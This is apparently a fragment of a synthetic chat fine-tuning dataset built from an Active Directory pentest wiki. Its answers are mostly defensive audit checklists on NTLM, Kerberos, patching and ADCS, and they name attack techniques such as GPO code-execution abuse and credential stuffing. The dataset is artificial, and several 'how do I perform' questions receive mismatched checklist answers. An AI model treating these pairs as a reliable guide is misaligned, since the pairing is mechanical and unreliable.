the aforementioned exploitation paths, GPOs can be abused in other ways: leveraging logon/logoff scripts, using registry for autoruns, installing .msi, edit services and similar code execution avenues."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Group policies - Other exploitation paths", "response": "In addition to the aforementioned exploitation paths, GPOs can be abused in other ways: leveraging logon/logoff scripts, using registry for autoruns, installing .msi, edit services and similar code execution avenues.", "metadata": {"corpus_index": 489, "category": "active_directory", "source_file": "docs/src/ad/movement/group-policies.md", "page_title": "Group policies", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Group policies - Other exploitation paths"}, {"role": "assistant", "content": "In addition to the aforementioned exploitation paths, GPOs can be abused in other ways: leveraging logon/logoff scripts, using registry for autoruns, installing .msi, edit services and similar code execution avenues."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Group policies - Other exploitation paths", "response": "In addition to the aforementioned exploitation paths, GPOs can be abused in other ways: leveraging logon/logoff scripts, using registry for autoruns, installing .msi, edit services and similar code execution avenues.", "metadata": {"corpus_index": 489, "category": "active_directory", "source_file": "docs/src/ad/movement/group-policies.md", "page_title": "Group policies", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Movement work?"}, {"role": "assistant", "content": "> [!WARNING]\n> This is a work-in-progress\n\nBelow is a checklist to go through when conducting a pentest. Order is irrelevant and many tests require authenticated or admin access. This checklist answers \"what to audit on AD?\" rather than \"how to pwn AD?\". A mindmap is in the works for that matter :wink: ."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Movement work?", "response": "> [!WARNING]\n> This is a work-in-progress\n\nBelow is a checklist to go through when conducting a pentest. Order is irrelevant and many tests require authenticated or admin access. This checklist answers \"what to audit on AD?\" rather than \"how to pwn AD?\". A mindmap is in the works for that matter :wink: .", "metadata": {"corpus_index": 490, "category": "active_directory", "source_file": "docs/src/ad/movement/index.md", "page_title": "Movement", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Movement"}, {"role": "assistant", "content": "> [!WARNING]\n> This is a work-in-progress\n\nBelow is a checklist to go through when conducting a pentest. Order is irrelevant and many tests require authenticated or admin access. This checklist answers \"what to audit on AD?\" rather than \"how to pwn AD?\". A mindmap is in the works for that matter :wink: ."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Movement", "response": "> [!WARNING]\n> This is a work-in-progress\n\nBelow is a checklist to go through when conducting a pentest. Order is irrelevant and many tests require authenticated or admin access. This checklist answers \"what to audit on AD?\" rather than \"how to pwn AD?\". A mindmap is in the works for that matter :wink: .", "metadata": {"corpus_index": 490, "category": "active_directory", "source_file": "docs/src/ad/movement/index.md", "page_title": "Movement", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Movement - NTLM configuration work?"}, {"role": "assistant", "content": "* [ ] Obsolete versions of this protocol (LM, LMv2 and NTLM(v1)) are disabled and NTLM (all versions) is disabled when possible. This allows to stay safe from NTLM relay, NTLM capture and cracking and pass-the-hash attacks."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Movement - NTLM configuration work?", "response": "* [ ] Obsolete versions of this protocol (LM, LMv2 and NTLM(v1)) are disabled and NTLM (all versions) is disabled when possible. This allows to stay safe from NTLM relay, NTLM capture and cracking and pass-the-hash attacks.", "metadata": {"corpus_index": 491, "category": "active_directory", "source_file": "docs/src/ad/movement/index.md", "page_title": "Movement", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Movement - NTLM configuration"}, {"role": "assistant", "content": "* [ ] Obsolete versions of this protocol (LM, LMv2 and NTLM(v1)) are disabled and NTLM (all versions) is disabled when possible. This allows to stay safe from NTLM relay, NTLM capture and cracking and pass-the-hash attacks."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Movement - NTLM configuration", "response": "* [ ] Obsolete versions of this protocol (LM, LMv2 and NTLM(v1)) are disabled and NTLM (all versions) is disabled when possible. This allows to stay safe from NTLM relay, NTLM capture and cracking and pass-the-hash attacks.", "metadata": {"corpus_index": 491, "category": "active_directory", "source_file": "docs/src/ad/movement/index.md", "page_title": "Movement", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Movement - Kerberos configuration"}, {"role": "assistant", "content": "* [ ] krbtgt's password has been changed in the last 6 months to prevent Golden Ticket persistence attacks. From UNIX-like systems, this can be checked with Impacket's Get-ADUsers.py script.\n* [ ] The RC4 etype is disabled for Kerberos to prevent overpass-the-hash and NTLMv1 capture and cracking to Silver Ticket attacks. This can be checked by attempting to obtain a TGT with an NT hash.\n* [ ] No account is configured with Do not require Kerberos Pre-Authentication allowing for ASREProast attacks, or make sure those account have strong password resistant to cracking.\n* [ ] User accounts that have at least one ServicePrincipalName, hence vulnerable to Kerberoast, have a strong password, resistant to cracking."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Movement - Kerberos configuration", "response": "* [ ] krbtgt's password has been changed in the last 6 months to prevent Golden Ticket persistence attacks. From UNIX-like systems, this can be checked with Impacket's Get-ADUsers.py script.\n* [ ] The RC4 etype is disabled for Kerberos to prevent overpass-the-hash and NTLMv1 capture and cracking to Silver Ticket attacks. This can be checked by attempting to obtain a TGT with an NT hash.\n* [ ] No account is configured with Do not require Kerberos Pre-Authentication allowing for ASREProast attacks, or make sure those account have strong password resistant to cracking.\n* [ ] User accounts that have at least one ServicePrincipalName, hence vulnerable to Kerberoast, have a strong password, resistant to cracking.", "metadata": {"corpus_index": 492, "category": "active_directory", "source_file": "docs/src/ad/movement/index.md", "page_title": "Movement", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Movement - Kerberos configuration?"}, {"role": "assistant", "content": "* [ ] krbtgt's password has been changed in the last 6 months to prevent Golden Ticket persistence attacks. From UNIX-like systems, this can be checked with Impacket's Get-ADUsers.py script.\n* [ ] The RC4 etype is disabled for Kerberos to prevent overpass-the-hash and NTLMv1 capture and cracking to Silver Ticket attacks. This can be checked by attempting to obtain a TGT with an NT hash.\n* [ ] No account is configured with Do not require Kerberos Pre-Authentication allowing for ASREProast attacks, or make sure those account have strong password resistant to cracking.\n* [ ] User accounts that have at least one ServicePrincipalName, hence vulnerable to Kerberoast, have a strong password, resistant to cracking."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Movement - Kerberos configuration?", "response": "* [ ] krbtgt's password has been changed in the last 6 months to prevent Golden Ticket persistence attacks. From UNIX-like systems, this can be checked with Impacket's Get-ADUsers.py script.\n* [ ] The RC4 etype is disabled for Kerberos to prevent overpass-the-hash and NTLMv1 capture and cracking to Silver Ticket attacks. This can be checked by attempting to obtain a TGT with an NT hash.\n* [ ] No account is configured with Do not require Kerberos Pre-Authentication allowing for ASREProast attacks, or make sure those account have strong password resistant to cracking.\n* [ ] User accounts that have at least one ServicePrincipalName, hence vulnerable to Kerberoast, have a strong password, resistant to cracking.", "metadata": {"corpus_index": 492, "category": "active_directory", "source_file": "docs/src/ad/movement/index.md", "page_title": "Movement", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Movement - Patch management work?"}, {"role": "assistant", "content": "* [ ] Domain Controllers are patched against ZeroLogon.\n* [ ] Domain Controllers are patched against Kerberos sAMAccountName spoofing.\n* [ ] MS14-068 is patched, preventing forging of powerful Kerberos tickets.\n* [ ] PrivExchange patches are applied, protecting Exchange servers from authentication coercion attacks relying on the PushSubscription API, and ACE abuse attacks relying on the EXCHANGE WINDOWS PERMISSION group having WriteDacl permissions against the domain object allowing for DCSync.\n* [ ] Patches for NTLM tampering vulnerabilities (e.g. CVE-2019-1040, CVE-2019-1019, CVE-2019-1166) are applied to limit NTLM relay attacks.\n* [ ] Latest security patched are applied (e.g. for ProxyLogon, ProxyShell, PrintNightmare, ...)."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Movement - Patch management work?", "response": "* [ ] Domain Controllers are patched against ZeroLogon.\n* [ ] Domain Controllers are patched against Kerberos sAMAccountName spoofing.\n* [ ] MS14-068 is patched, preventing forging of powerful Kerberos tickets.\n* [ ] PrivExchange patches are applied, protecting Exchange servers from authentication coercion attacks relying on the PushSubscription API, and ACE abuse attacks relying on the EXCHANGE WINDOWS PERMISSION group having WriteDacl permissions against the domain object allowing for DCSync.\n* [ ] Patches for NTLM tampering vulnerabilities (e.g. CVE-2019-1040, CVE-2019-1019, CVE-2019-1166) are applied to limit NTLM relay attacks.\n* [ ] Latest security patched are applied (e.g. for ProxyLogon, ProxyShell, PrintNightmare, ...).", "metadata": {"corpus_index": 493, "category": "active_directory", "source_file": "docs/src/ad/movement/index.md", "page_title": "Movement", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Movement - Patch management"}, {"role": "assistant", "content": "* [ ] Domain Controllers are patched against ZeroLogon.\n* [ ] Domain Controllers are patched against Kerberos sAMAccountName spoofing.\n* [ ] MS14-068 is patched, preventing forging of powerful Kerberos tickets.\n* [ ] PrivExchange patches are applied, protecting Exchange servers from authentication coercion attacks relying on the PushSubscription API, and ACE abuse attacks relying on the EXCHANGE WINDOWS PERMISSION group having WriteDacl permissions against the domain object allowing for DCSync.\n* [ ] Patches for NTLM tampering vulnerabilities (e.g. CVE-2019-1040, CVE-2019-1019, CVE-2019-1166) are applied to limit NTLM relay attacks.\n* [ ] Latest security patched are applied (e.g. for ProxyLogon, ProxyShell, PrintNightmare, ...)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Movement - Patch management", "response": "* [ ] Domain Controllers are patched against ZeroLogon.\n* [ ] Domain Controllers are patched against Kerberos sAMAccountName spoofing.\n* [ ] MS14-068 is patched, preventing forging of powerful Kerberos tickets.\n* [ ] PrivExchange patches are applied, protecting Exchange servers from authentication coercion attacks relying on the PushSubscription API, and ACE abuse attacks relying on the EXCHANGE WINDOWS PERMISSION group having WriteDacl permissions against the domain object allowing for DCSync.\n* [ ] Patches for NTLM tampering vulnerabilities (e.g. CVE-2019-1040, CVE-2019-1019, CVE-2019-1166) are applied to limit NTLM relay attacks.\n* [ ] Latest security patched are applied (e.g. for ProxyLogon, ProxyShell, PrintNightmare, ...).", "metadata": {"corpus_index": 493, "category": "active_directory", "source_file": "docs/src/ad/movement/index.md", "page_title": "Movement", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Movement - Access Management (IAM/PAM)"}, {"role": "assistant", "content": "* [ ] Local administrators have a unique, random, complex and rotating password on every server/workstation (e.g. use of LAPS). This can be checked by dumping a local admin password or hash and attempting credential stuffing (i.e. trying to log in on other resources with that password/hash).\n* [ ] Strong password and lockout policies exist and are applied (complexity enabled, at least 12 chars, 16 for admins, must change every 6 months) and users know not to use simple and guessable passwords (e.g. password == username) limiting credential bruteforcing, guessing, stuffing and cracking attacks.\n* [ ] Tier Model is applied (administrative personnel have multiple accounts, one for each tier, with different passwords and security requirements for each one) and a \"least requirement\" policy is followed (i.e. service accounts don't have domain admin (or equivalent) privileges, ACEs are carefully set) limiting credential bruteforcing, guessing, stuffing and cracking attacks.\n* [ ] Sensitive network shares are not readable by all users. A \"need to know\" policy is followed, preventing data leak and other.\n* [ ] No account is configured with Kerberos Unconstrained Delegation capabilities.\n* [ ] No computer account has admin privileges over another one. This limits NTLM relay attacks."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Movement - Access Management (IAM/PAM)", "response": "* [ ] Local administrators have a unique, random, complex and rotating password on every server/workstation (e.g. use of LAPS). This can be checked by dumping a local admin password or hash and attempting credential stuffing (i.e. trying to log in on other resources with that password/hash).\n* [ ] Strong password and lockout policies exist and are applied (complexity enabled, at least 12 chars, 16 for admins, must change every 6 months) and users know not to use simple and guessable passwords (e.g. password == username) limiting credential bruteforcing, guessing, stuffing and cracking attacks.\n* [ ] Tier Model is applied (administrative personnel have multiple accounts, one for each tier, with different passwords and security requirements for each one) and a \"least requirement\" policy is followed (i.e. service accounts don't have domain admin (or equivalent) privileges, ACEs are carefully set) limiting credential bruteforcing, guessing, stuffing and cracking attacks.\n* [ ] Sensitive network shares are not readable by all users. A \"need to know\" policy is followed, preventing data leak and other.\n* [ ] No account is configured with Kerberos Unconstrained Delegation capabilities.\n* [ ] No computer account has admin privileges over another one. This limits NTLM relay attacks.", "metadata": {"corpus_index": 494, "category": "active_directory", "source_file": "docs/src/ad/movement/index.md", "page_title": "Movement", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Movement - Access Management (IAM/PAM) during a pentest?"}, {"role": "assistant", "content": "* [ ] Local administrators have a unique, random, complex and rotating password on every server/workstation (e.g. use of LAPS). This can be checked by dumping a local admin password or hash and attempting credential stuffing (i.e. trying to log in on other resources with that password/hash).\n* [ ] Strong password and lockout policies exist and are applied (complexity enabled, at least 12 chars, 16 for admins, must change every 6 months) and users know not to use simple and guessable passwords (e.g. password == username) limiting credential bruteforcing, guessing, stuffing and cracking attacks.\n* [ ] Tier Model is applied (administrative personnel have multiple accounts, one for each tier, with different passwords and security requirements for each one) and a \"least requirement\" policy is followed (i.e. service accounts don't have domain admin (or equivalent) privileges, ACEs are carefully set) limiting credential bruteforcing, guessing, stuffing and cracking attacks.\n* [ ] Sensitive network shares are not readable by all users. A \"need to know\" policy is followed, preventing data leak and other.\n* [ ] No account is configured with Kerberos Unconstrained Delegation capabilities.\n* [ ] No computer account has admin privileges over another one. This limits NTLM relay attacks."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Movement - Access Management (IAM/PAM) during a pentest?", "response": "* [ ] Local administrators have a unique, random, complex and rotating password on every server/workstation (e.g. use of LAPS). This can be checked by dumping a local admin password or hash and attempting credential stuffing (i.e. trying to log in on other resources with that password/hash).\n* [ ] Strong password and lockout policies exist and are applied (complexity enabled, at least 12 chars, 16 for admins, must change every 6 months) and users know not to use simple and guessable passwords (e.g. password == username) limiting credential bruteforcing, guessing, stuffing and cracking attacks.\n* [ ] Tier Model is applied (administrative personnel have multiple accounts, one for each tier, with different passwords and security requirements for each one) and a \"least requirement\" policy is followed (i.e. service accounts don't have domain admin (or equivalent) privileges, ACEs are carefully set) limiting credential bruteforcing, guessing, stuffing and cracking attacks.\n* [ ] Sensitive network shares are not readable by all users. A \"need to know\" policy is followed, preventing data leak and other.\n* [ ] No account is configured with Kerberos Unconstrained Delegation capabilities.\n* [ ] No computer account has admin privileges over another one. This limits NTLM relay attacks.", "metadata": {"corpus_index": 494, "category": "active_directory", "source_file": "docs/src/ad/movement/index.md", "page_title": "Movement", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Movement - Credentials Management"}, {"role": "assistant", "content": "* [ ] Caching of domain users is limited on workstations and avoided on servers to prevent credential dumping of LSA secrets from registry.\n* [ ] Group Policy Preferences Passwords are not used.\n* [ ] LSA protection are enabled to prevent LSASS dumping.\n* [ ] Network shares readable by all domain users don't contain sensitive data like passwords or certificates limiting credential dumping."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Movement - Credentials Management", "response": "* [ ] Caching of domain users is limited on workstations and avoided on servers to prevent credential dumping of LSA secrets from registry.\n* [ ] Group Policy Preferences Passwords are not used.\n* [ ] LSA protection are enabled to prevent LSASS dumping.\n* [ ] Network shares readable by all domain users don't contain sensitive data like passwords or certificates limiting credential dumping.", "metadata": {"corpus_index": 495, "category": "active_directory", "source_file": "docs/src/ad/movement/index.md", "page_title": "Movement", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Movement - Credentials Management?"}, {"role": "assistant", "content": "* [ ] Caching of domain users is limited on workstations and avoided on servers to prevent credential dumping of LSA secrets from registry.\n* [ ] Group Policy Preferences Passwords are not used.\n* [ ] LSA protection are enabled to prevent LSASS dumping.\n* [ ] Network shares readable by all domain users don't contain sensitive data like passwords or certificates limiting credential dumping."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Movement - Credentials Management?", "response": "* [ ] Caching of domain users is limited on workstations and avoided on servers to prevent credential dumping of LSA secrets from registry.\n* [ ] Group Policy Preferences Passwords are not used.\n* [ ] LSA protection are enabled to prevent LSASS dumping.\n* [ ] Network shares readable by all domain users don't contain sensitive data like passwords or certificates limiting credential dumping.", "metadata": {"corpus_index": 495, "category": "active_directory", "source_file": "docs/src/ad/movement/index.md", "page_title": "Movement", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Movement - Domain-level configuration and best-practices"}, {"role": "assistant", "content": "* [ ] The Machine Account Quota domain-level attribute is set to 0, preventing domain users from creating domain-joined computer accounts.\n* [ ] Default special groups are empty, limiting, among other things, out-of-box ACE abuses."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Movement - Domain-level configuration and best-practices", "response": "* [ ] The Machine Account Quota domain-level attribute is set to 0, preventing domain users from creating domain-joined computer accounts.\n* [ ] Default special groups are empty, limiting, among other things, out-of-box ACE abuses.", "metadata": {"corpus_index": 496, "category": "active_directory", "source_file": "docs/src/ad/movement/index.md", "page_title": "Movement", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Movement - Domain-level configuration and best-practices during a pentest?"}, {"role": "assistant", "content": "* [ ] The Machine Account Quota domain-level attribute is set to 0, preventing domain users from creating domain-joined computer accounts.\n* [ ] Default special groups are empty, limiting, among other things, out-of-box ACE abuses."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Movement - Domain-level configuration and best-practices during a pentest?", "response": "* [ ] The Machine Account Quota domain-level attribute is set to 0, preventing domain users from creating domain-joined computer accounts.\n* [ ] Default special groups are empty, limiting, among other things, out-of-box ACE abuses.", "metadata": {"corpus_index": 496, "category": "active_directory", "source_file": "docs/src/ad/movement/index.md", "page_title": "Movement", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Movement - Networking, protocols and services work?"}, {"role": "assistant", "content": "* [ ] SMB signing is required when possible, especially on sensitive servers, preventing NTLM relay attacks.\n* [ ] LDAP signing is required on Domain Controllers, preventing NTLM relay attacks.\n* [ ] Extended Protection for Authentication (EPA) is required, especially for Domain Controllers supporting LDAPS, preventing NTLM relay attacks.\n* [ ] IPv6 is either fully configured and used or disabled, preventing DHCPv6 spoofing with DNS poisoning attacks.\n* [ ] LLMNR, NBT-NS and mDNS are disabled, preventing MITM attacks relying on those multicast/broadcast domain name resolution protocols.\n* [ ] WPAD is disabled, preventing WPAD spoofing.\n [ ] A record exists in ADIDNS for the ` (wildcard) preventing powerful ADIDNS poisoning attacks. Preferably, this is a TXT` record.\n* [ ] The print spooler is disabled on Domain Controllers and sensitive servers to prevent the PrinterBug authentication coercion attack.\n* [ ] The WSUS server (if any) is configured with HTTPS, to prevent ARP poisoning with WSUS spoofing attacks.\n* [ ] Set-up packet filtering & inspection and enable port security on network switched to prevent ARP poisoning attacks and network secrets dumping. \n* [ ] Set-up VLANs, 802.1X or other NAC (Network Access Control) securities to limit the attackers progress within the network.\n* [ ] Plaintext protocols are avoided when using credentials (HTTP, FTP, ...), in order to minimize the risks of the capture of credentials transiting on the network."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Movement - Networking, protocols and services work?", "response": "* [ ] SMB signing is required when possible, especially on sensitive servers, preventing NTLM relay attacks.\n* [ ] LDAP signing is required on Domain Controllers, preventing NTLM relay attacks.\n* [ ] Extended Protection for Authentication (EPA) is required, especially for Domain Controllers supporting LDAPS, preventing NTLM relay attacks.\n* [ ] IPv6 is either fully configured and used or disabled, preventing DHCPv6 spoofing with DNS poisoning attacks.\n* [ ] LLMNR, NBT-NS and mDNS are disabled, preventing MITM attacks relying on those multicast/broadcast domain name resolution protocols.\n* [ ] WPAD is disabled, preventing WPAD spoofing.\n [ ] A record exists in ADIDNS for the ` (wildcard) preventing powerful ADIDNS poisoning attacks. Preferably, this is a TXT` record.\n* [ ] The print spooler is disabled on Domain Controllers and sensitive servers to prevent the PrinterBug authentication coercion attack.\n* [ ] The WSUS server (if any) is configured with HTTPS, to prevent ARP poisoning with WSUS spoofing attacks.\n* [ ] Set-up packet filtering & inspection and enable port security on network switched to prevent ARP poisoning attacks and network secrets dumping. \n* [ ] Set-up VLANs, 802.1X or other NAC (Network Access Control) securities to limit the attackers progress within the network.\n* [ ] Plaintext protocols are avoided when using credentials (HTTP, FTP, ...), in order to minimize the risks of the capture of credentials transiting on the network.", "metadata": {"corpus_index": 497, "category": "active_directory", "source_file": "docs/src/ad/movement/index.md", "page_title": "Movement", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Movement - Networking, protocols and services"}, {"role": "assistant", "content": "* [ ] SMB signing is required when possible, especially on sensitive servers, preventing NTLM relay attacks.\n* [ ] LDAP signing is required on Domain Controllers, preventing NTLM relay attacks.\n* [ ] Extended Protection for Authentication (EPA) is required, especially for Domain Controllers supporting LDAPS, preventing NTLM relay attacks.\n* [ ] IPv6 is either fully configured and used or disabled, preventing DHCPv6 spoofing with DNS poisoning attacks.\n* [ ] LLMNR, NBT-NS and mDNS are disabled, preventing MITM attacks relying on those multicast/broadcast domain name resolution protocols.\n* [ ] WPAD is disabled, preventing WPAD spoofing.\n [ ] A record exists in ADIDNS for the ` (wildcard) preventing powerful ADIDNS poisoning attacks. Preferably, this is a TXT` record.\n* [ ] The print spooler is disabled on Domain Controllers and sensitive servers to prevent the PrinterBug authentication coercion attack.\n* [ ] The WSUS server (if any) is configured with HTTPS, to prevent ARP poisoning with WSUS spoofing attacks.\n* [ ] Set-up packet filtering & inspection and enable port security on network switched to prevent ARP poisoning attacks and network secrets dumping. \n* [ ] Set-up VLANs, 802.1X or other NAC (Network Access Control) securities to limit the attackers progress within the network.\n* [ ] Plaintext protocols are avoided when using credentials (HTTP, FTP, ...), in order to minimize the risks of the capture of credentials transiting on the network."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Movement - Networking, protocols and services", "response": "* [ ] SMB signing is required when possible, especially on sensitive servers, preventing NTLM relay attacks.\n* [ ] LDAP signing is required on Domain Controllers, preventing NTLM relay attacks.\n* [ ] Extended Protection for Authentication (EPA) is required, especially for Domain Controllers supporting LDAPS, preventing NTLM relay attacks.\n* [ ] IPv6 is either fully configured and used or disabled, preventing DHCPv6 spoofing with DNS poisoning attacks.\n* [ ] LLMNR, NBT-NS and mDNS are disabled, preventing MITM attacks relying on those multicast/broadcast domain name resolution protocols.\n* [ ] WPAD is disabled, preventing WPAD spoofing.\n [ ] A record exists in ADIDNS for the ` (wildcard) preventing powerful ADIDNS poisoning attacks. Preferably, this is a TXT` record.\n* [ ] The print spooler is disabled on Domain Controllers and sensitive servers to prevent the PrinterBug authentication coercion attack.\n* [ ] The WSUS server (if any) is configured with HTTPS, to prevent ARP poisoning with WSUS spoofing attacks.\n* [ ] Set-up packet filtering & inspection and enable port security on network switched to prevent ARP poisoning attacks and network secrets dumping. \n* [ ] Set-up VLANs, 802.1X or other NAC (Network Access Control) securities to limit the attackers progress within the network.\n* [ ] Plaintext protocols are avoided when using credentials (HTTP, FTP, ...), in order to minimize the risks of the capture of credentials transiting on the network.", "metadata": {"corpus_index": 497, "category": "active_directory", "source_file": "docs/src/ad/movement/index.md", "page_title": "Movement", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Movement - Active Directory Certificate Services?"}, {"role": "assistant", "content": "* [ ] The CA is configured correctly (the EDITF_ATTRIBUTESUBJECTALTNAME2 flag is not set). This prevents the corresponding domain escalation attack.\n* [ ] There are no certificate templates that are badly configured. This prevents the corresponding domain escalation attack.\n* [ ] AD-CS web and RPC endpoints are secured against AD-CS NTLM relay attacks (HTTPS, EPA (Extended Protection for Authentication) and encryption enforced)."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Movement - Active Directory Certificate Services?", "response": "* [ ] The CA is configured correctly (the EDITF_ATTRIBUTESUBJECTALTNAME2 flag is not set). This prevents the corresponding domain escalation attack.\n* [ ] There are no certificate templates that are badly configured. This prevents the corresponding domain escalation attack.\n* [ ] AD-CS web and RPC endpoints are secured against 